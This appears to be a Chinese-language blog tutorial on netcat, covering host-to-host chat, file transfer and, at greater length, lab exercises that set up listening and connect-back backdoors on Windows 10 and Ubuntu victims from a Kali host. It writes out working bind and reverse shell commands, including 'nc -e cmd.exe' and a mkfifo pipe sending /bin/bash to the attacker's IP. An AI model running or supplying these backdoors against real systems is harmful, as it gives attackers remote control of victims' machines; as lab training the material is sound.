天天看點

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

【瑞士軍刀】netcat使用方法

本文僅用作學習用途,切莫做違法的事情,産生一切後果與本人無關。

1、主機間通信

服務端開啟

nc -l -p 4444

-l listening

-p Port

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

nc IP Port

連接配接服務端

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

2、遠端shell

nc -l -p 4444 -e cmd.exe

-e 遠端連接配接shell(比較危險)

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

nc IP Port

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

3、檔案傳輸

nc -l -p 4444 > file.txt

作為服務端開啟監聽模式,将遠端傳來的檔案導入到本地file.txt檔案中。(>為覆寫,>>為追加)

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

nc IP Port < test.txt

将test.txt檔案内容傳輸到指定主機。

先建立一個test.txt檔案,寫入i love you。

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

将該檔案遠端傳輸到kali

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

到kali檢視結果:

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

檔案傳輸成功!

4、建立後門

後門的分類

監聽後門:受害者做服務端,攻擊者做用戶端,受害者等待攻擊者主動連接配接

連接配接後門:攻擊者做服務端,受害者做用戶端,受害者自動連接配接攻擊者

  • 在window建立後門

    實驗一:

    後門類型 實驗環境
    連接配接後門 受害者windows10: 192.168.31.212; 攻擊者kali:192.168.31.250
    在kali開啟服務端:

    nc -l -p 4444

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

​ 在win10去連接配接kali:

nc IP Port cmd.exe

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

​ kali直接擷取windows的shell:

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

​ 實驗二:

後門類型 實驗環境
監聽後門 受害主機win10: 192.168.31.212 ; 攻擊主機kali:192.168.31.250

在win10開啟服務端:

nc -l -p 4444 -e cmd.exe

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

在kali去連接配接win10:

nc 192.168.31.212 4444

【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

如圖所示成功連接配接,成功建立後門!

  • 在linux上建立後門

    實驗一:

    後門類型 實驗環境
    監聽後門 受害主機ubuntu: 192.168.31.49 ; 攻擊者kali: 192.168.31.250

    kali中的netcat是GNU版

    ubuntu中的netcat是openbsd版,此版本

    -e

    指令被删除了,我們管道來代替完成。

    先在ubuntu中建立後門,執行以下指令:

    mkfifo /tmp/f

    建立一個命名管道

    cat /tmp/f | /bin/bash 2>&1 | /bin/nc.openbsd -l -p 9090 > /tmp/f

    開啟服務端
    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法
    在kail中連接配接:

    nc 192.168.31.250 9090

    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法
    嘗試運作shell指令:
    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法

    如圖所示,執行成功!

    實驗二:

    後門類型 實驗環境
    連接配接後門 受害主機ubuntu: 192.168.31.49 ; 攻擊者kali: 192.168.31.250
    先在kali中開啟服務端:

    nc -l -p 9090

    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法
    在ubuntu中建立後門:

    cat /tmp/f | /bin/bash 2>&1 | /bin/nc.openbsd 192.168.31.250 9090 > /tmp/f

    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法
    回到kali中嘗試執行shell指令:
    【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法
    如圖所示,執行成功,說明後門建立成功!

繼續閱讀